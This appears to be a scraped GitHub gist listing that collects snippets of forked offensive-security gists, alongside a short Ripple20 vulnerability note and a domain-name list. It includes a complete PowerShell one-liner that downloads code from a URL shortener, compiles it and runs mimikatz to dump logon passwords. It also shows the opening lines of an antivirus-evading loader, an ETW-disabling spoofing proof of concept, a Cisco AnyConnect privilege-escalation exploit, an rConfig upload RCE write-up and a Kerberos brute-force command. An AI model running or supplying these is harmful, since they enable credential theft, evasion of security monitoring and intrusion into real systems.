- Ripple20 is the codename to a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
- These vulnerabilities are inside an IP stack, selled under two different names (Treck TCP/IP for U.S market Kasago TCP/IP, for Asia market. -These two stacks were bought and used under privated-labeled by several softwares companies, some known names are: GHnetv2, Kwiknet, Quadnet.
- But there's more, these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating system).
- Last, some of the vulnerabilities, depending the device operating system, configuration or location can have greater or lower CVSS score.
- My advice is for companies to ask their suppliers if they use one of this stack and assess the risk following their company risk policy.
- This will not be an easy set of vulnerabilities to patch, sadly.
FlatL1neAPT
/ 20200618-TLP-WHITE_Ripple20.md
Created
June 20, 2020 10:59
— forked from SwitHak/20200618-TLP-WHITE_Ripple20.md
BlueTeam CheatSheet * Ripple20 * | Last updated: 2020-06-18 2201 UTC
FlatL1neAPT
/ css.html
Created
June 18, 2020 04:11
— forked from keerok/css.html
css timing attack via window.opener
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en" dir="ltr"> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title></title> | |
| <h1>working on chrome linux & mac</h1> | |
| <a href="" target=_blank>click me before</a> | |
| </head> | |
| <body> | |
| <button type="button" id=clickme name="button">click me</button> |
FlatL1neAPT
/ katz.cmd
Created
June 13, 2020 09:23
— forked from xillwillx/katz.cmd
mimikatz.cs one-liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
FlatL1neAPT
/ NetLoader.cs
Created
June 12, 2020 10:15
— forked from Arno0x/NetLoader.cs
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| Completely based on @Flangvik netloader | |
| This partial rewrite of @Flangvik Netloader includes the following changes: | |
| - Allow loading of an XOR encrypted binary to bypass antiviruses | |
| To encrypt the initial binary you can use my Python transformFile.py script. | |
| Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
FlatL1neAPT
/ env_var_spoofing_poc.cpp
Created
June 12, 2020 10:10
— forked from xpn/env_var_spoofing_poc.cpp
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
FlatL1neAPT
/ env_var_spoofing_poc.cpp
Created
June 12, 2020 10:10
— forked from xpn/env_var_spoofing_poc.cpp
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
FlatL1neAPT
/ common-domain-prefix-suffix-list.tsv
Created
May 30, 2020 07:01
— forked from erikig/common-domain-prefix-suffix-list.tsv
Top 5000 Most Common Domain Prefix/Suffix List - Courtesy LeanDomainSearch - https://leandomainsearch.com/top-domain-name-prefixes-and-suffixes/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rank | Type | Prefix/Suffix | |
|---|---|---|---|
| 1. | Prefix | my+ | |
| 2. | Suffix | +online | |
| 3. | Prefix | the+ | |
| 4. | Suffix | +web | |
| 5. | Suffix | +media | |
| 6. | Prefix | web+ | |
| 7. | Suffix | +world | |
| 8. | Suffix | +net | |
| 9. | Prefix | go+ |
FlatL1neAPT
/ Invoke-ExploitAnyConnectPathTraversal.psm1
Created
May 23, 2020 09:03
— forked from ykoster/Invoke-ExploitAnyConnectPathTraversal.psm1
Proof of concept for CVE-2020-3153 - Cisco AnyConnect elevation of privileges due to insecure handling of path names - https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows | |
| .Description | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows. | |
| When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll. | |
| This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen. | |
| Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges. |
FlatL1neAPT
/ Rconfig File Upload RCE Exploit
Created
May 23, 2020 09:00
— forked from farid007/Rconfig File Upload RCE Exploit
Rconfig 3.9.4 File Upload RCE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Remote Code Execution via File Upload (CVE-2020-12255) | |
| The rConfig 3.9.4 is vulnerable to remote code execution due to improper checks/validation via the file upload functionality. | |
| The vendor.crud.php accepts the file upload by checking through content-type and it is not restricting upload by checking the file extension and header. | |
| Due to this flaw, An attacker can exploit this vulnerability by uploading a PHP file that contains arbitrary code (shell) and changing the content-type to `image/gif` in the vendor.crud.php. | |
| since the validation checks are happening through content-type the server would accept the PHP file uploaded ultimately resulting code execution upon the response when invoked. | |
| Steps To Reproduce-: |
FlatL1neAPT
/ kerberos_attacks_cheatsheet.md
Created
August 29, 2019 19:37
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
NewerOlder